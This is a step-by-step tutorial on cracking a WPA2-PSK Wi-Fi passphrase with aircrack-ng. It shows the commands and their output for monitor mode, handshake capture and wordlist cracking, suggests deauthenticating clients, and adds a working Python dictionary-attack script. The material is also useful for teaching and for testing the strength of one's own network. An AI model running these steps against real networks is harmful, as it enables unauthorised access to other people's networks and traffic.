Cracking WPA2-PSK with Kali Linux
(brute force with dictionary)
One of the most common attacks against WPA2 is exploiting a weak passphrase: capture the 4-way handshake between a client and the access point, then test candidate passphrases from a dictionary against it offline.

Hardware: Alfa AWUS051NH wifi adapter
The iwconfig command will show any wireless cards in the system.
# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=0 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

lo        no wireless extensions.

eth0      no wireless extensions.

# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:23:8b:f0:9e:eb  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 1440  bytes 116640 (113.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1440  bytes 116640 (113.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:26:5e:0f:a2:15  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Bring the card up and scan for networks in range:

# ifconfig wlan0 up
# iwlist wlan0 scanning
wlan0     Scan completed :
          Cell 01 - Address: 00:47:B7:70:1A:1E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=47/70  Signal level=-63 dBm
                    Encryption key:on
                    ESSID:"Home-Wifi"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=000003d892db3984
                    Extra: Last beacon: 472ms ago
                    IE: Unknown: 0014546F7572696E67436C756252686F64616E69656E
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 0706465220010D14
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: 2D1AAD011BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 331AAD011BFFFF000000000000000000000000000000000000000000
                    IE: Unknown: 3D1606000100000000000000000000000000000000000000
                    IE: Unknown: 341606000100000000000000000000000000000000000000
                    IE: Unknown: DD180050F2020101860003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
                    IE: Unknown: DDA90050F204104A0001101044000102103B000103104700

The RSN information element confirms the target: WPA2, CCMP, PSK authentication, on channel 6. Create the monitor interface with the command:

# airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  370 NetworkManager
  489 wpa_supplicant

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k           Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)

As the warning says, stop NetworkManager and wpa_supplicant first (airmon-ng check kill), or they may reset the interface in the middle of a capture. The new monitor interface wlan0mon now shows up in ifconfig:

# ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether 00:23:8b:f0:9e:eb  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1  (Local Loopback)
        RX packets 2560  bytes 207360 (202.5 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2560  bytes 207360 (202.5 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

wlan0mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        unspec 00-26-5E-0F-A2-15-30-30-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 5084  bytes 1056710 (1.0 MiB)
        RX errors 0  dropped 5084  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Use airodump-ng to capture the WPA2 handshake:
# airodump-ng wlan0mon --bssid 00:47:B7:70:1A:1E --channel 6 --write CaptureWPA

(CaptureWPA is the prefix of the files airodump-ng writes; the first capture is saved as CaptureWPA-01.cap)

 CH  6 ][ Elapsed: 54 s ][ 2017-04-29 12:00

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:37:B7:80:1A:1E  -65 100      571        0    0   6  54e. WPA2 CCMP   PSK  Home-Wifi

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Here no station is listed and #Data stays at 0, so there is no handshake to capture yet: the 4-way handshake is only sent when a client associates. A network with connected clients is therefore preferable, or you must generate the traffic yourself (for example by deauthenticating an associated client with aireplay-ng so that it reconnects and repeats the handshake). airodump-ng prints "WPA handshake: <BSSID>" in its top line once the handshake is in the capture file; without that, aircrack-ng has nothing to test against.
# aircrack-ng CaptureWPA-01.cap -w BIG-WPA-LIST-1

(BIG-WPA-LIST-1 is the name of your dictionary file)

The dictionary file darkc0de.lst is a popular wordlist that shipped with BackTrack 5. Kali does not come with darkc0de.lst, but it ships rockyou.txt under /usr/share/wordlists/ (gzipped), and other wordlists can be downloaded from the net.

                                 Aircrack-ng 1.2 rc4

      [03:58:23] 96564163/99563408 keys tested (7270.07 k/s)

      Time left: 0 seconds                                      96.99%

                       Current passphrase: 8situarla

      Master Key     : 8C D7 10 C7 F9 55 F3 31 42 8F 50 B3 D5 11 50 54
                       5A CD 7A 98 71 A6 13 7D 42 8F 82 2A E5 34 60 6D

      Transient Key  : 4B 33 0F 6B 1C 4F 01 36 C8 B4 8C B2 3B 5D A1 13
                       7C D9 33 9E B1 A3 3B DA 0F F2 2F 6E E6 E3 0E 86
                       14 63 A6 1B 41 3D B2 79 21 12 51 06 6A EF 02 45
                       A7 CA 25 88 16 C8 85 68 34 80 4F 1A 84 D8 62 2F

      EAPOL HMAC     : 9E 33 72 A4 20 1C 53 BC 8A 50 33 35 F9 75 77 1A

Passphrase not in dictionary

This run failed: after almost four hours and 96 million candidates the passphrase was not in the list. The rate of about 7,000 keys per second is typical for a CPU, because each candidate costs 4,096 iterations of PBKDF2-HMAC-SHA1 to derive the Master Key (PMK); the Transient Key (PTK) and the EAPOL HMAC (the MIC) are then derived from it and compared with the MIC in the captured handshake. A short or dictionary-based passphrase falls to this attack; a long random one does not, which is the only real defence for WPA2-PSK.
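The following Python is an added example (not part of the original post and not aircrack-ng's code) showing the computation aircrack-ng performs for every line of the wordlist: derive the PMK from the candidate passphrase and SSID, expand it into the PTK with the two MAC addresses and nonces taken from the captured handshake, recompute the EAPOL MIC and compare it with the one in the capture. The handshake is constructed in the script itself (the SSID "Home-Wifi", the MAC addresses, the nonces and the secret "Summer2017!" are all made up for the demonstration), so it runs offline; the three values it derives correspond to the Master Key, Transient Key and EAPOL HMAC lines in the aircrack-ng output above.

```python
"""WPA2-PSK dictionary check, the per-candidate work behind aircrack-ng -w.

Added example with a constructed handshake; nothing here is a real capture.
"""
import hashlib
import hmac

PBKDF2_ITERATIONS = 4096   # fixed by WPA2-PSK; this is what limits the crack rate
MIC_OFFSET = 81            # Key MIC field inside an EAPOL-Key frame (after the 802.1X header)
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK (aircrack-ng's 'Master Key') = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), PBKDF2_ITERATIONS, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (aircrack-ng's 'Transient Key') via the 802.11i PRF; its first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):   # 4 x 20 bytes of HMAC-SHA1 output, truncated to the 64-byte CCMP PTK
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """EAPOL MIC (aircrack-ng's 'EAPOL HMAC') over the frame with its MIC field zeroed.

    Key descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) uses HMAC-SHA1-128.
    """
    version = int.from_bytes(eapol[5:7], "big") & 0x7   # low 3 bits of Key Information
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError(f"unsupported key descriptor version {version}")


def dictionary_attack(handshake: dict, wordlist):
    """Return (passphrase, keys_tested) on success or (None, keys_tested) if not in the list."""
    eapol = handshake["eapol"]
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    tested = 0
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:   # WPA2 passphrase length rule; such lines cannot be the key
            continue
        tested += 1
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        ptk = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), captured_mic):
            return candidate, tested
    return None, tested


def build_msg2(snonce: bytes) -> bytes:
    """EAPOL-Key message 2 of the 4-way handshake (constructed), with the MIC field zeroed."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")   # WPA2/CCMP/PSK
    key_info = 0x010A   # descriptor version 2 (HMAC-SHA1), Pairwise, MIC bit set
    body = (b"\x02"                                   # RSN key descriptor type
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")                 # key length (CCMP)
            + (1).to_bytes(8, "big")                  # replay counter
            + snonce                                  # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, key RSC, key ID
            + b"\x00" * MIC_LEN                       # key MIC, filled in by the supplicant
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v1, type EAPOL-Key


def constructed_handshake(true_passphrase: str) -> dict:
    """Play the supplicant: produce what an attacker would see in a capture of a made-up network."""
    hs = {
        "ssid": "Home-Wifi",                          # constructed
        "ap_mac": bytes.fromhex("0047b7701a1e"),      # constructed BSSID
        "sta_mac": bytes.fromhex("00265e0fa215"),     # constructed client MAC
        "anonce": bytes(range(32)),                   # constructed nonces
        "snonce": bytes(range(32, 64)),
    }
    eapol = build_msg2(hs["snonce"])
    kck = ptk_from_pmk(pmk_from_passphrase(true_passphrase, hs["ssid"]),
                       hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
    mic = eapol_mic(kck, eapol)
    hs["eapol"] = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + MIC_LEN:]
    return hs


if __name__ == "__main__":
    hs = constructed_handshake("Summer2017!")   # constructed secret the attacker does not know
    wordlist = ["password", "12345678", "8situarla", "Summer2017!", "letmein123"]
    print(dictionary_attack(hs, wordlist))       # ('Summer2017!', 4)
```

Run it as a script and it recovers the constructed passphrase on the fourth candidate; feed it a list without the passphrase and it returns (None, n), the equivalent of "Passphrase not in dictionary". Nearly all of the time is spent in pmk_from_passphrase, which is why aircrack-ng reports only thousands of keys per second on a CPU: the MIC depends on the SSID through the PBKDF2 salt, so nothing from one network's attack carries over to another, and a candidate that is not in the wordlist is never tried.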